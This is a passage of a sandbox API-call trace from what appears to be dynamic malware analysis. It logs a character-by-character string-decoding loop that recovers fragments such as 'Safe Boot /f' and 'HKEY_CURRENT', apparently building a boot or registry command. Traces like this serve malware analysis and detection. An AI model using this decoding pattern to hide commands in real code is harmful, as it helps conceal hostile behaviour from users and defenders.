lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.019] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0085.019] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.019] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0085.020] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.020] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0085.021] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.021] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0085.022] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0085.022] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0085.023] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.023] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0085.024] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.024] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0085.024] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.024] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0085.025] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.025] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0085.026] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.026] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0085.026] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0085.027] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0085.027] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.028] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0085.028] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.028] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0085.029] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.029] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0085.030] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.030] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0085.031] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0085.031] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0085.031] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.032] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0085.032] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.032] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0085.033] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.033] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0085.034] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0085.034] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0085.034] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.035] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.035] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0085.035] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.035] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0085.035] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.035] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0085.036] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.036] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0085.036] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.036] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0085.037] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.037] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0085.037] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.037] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="B", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0085.037] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.037] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.038] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.038] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.038] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.038] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.038] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.038] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.039] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.039] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0085.039] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.039] VarSub (in: pvarLeft=0x28f6d4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe580ec, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0085.039] VarCat (in: pvarLeft=0x28f514, pvarRight=0x28f504, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.040] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0085.040] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X", lpUsedDefaultChar=0x0) returned 1 [0085.040] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0085.041] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.041] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.041] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.041] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0085.041] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.041] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0085.042] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.042] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0085.042] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.042] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0085.043] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.043] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe56fbc, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0085.043] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.043] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0085.043] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.044] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe56fe4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0085.044] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.044] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe580d4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0085.044] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.044] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0085.045] VarCat (in: pvarLeft=0x28f5b4, pvarRight=0x28f594, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.045] VarSub (in: pvarLeft=0x28f654, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0085.045] MultiByteToWideChar (in: 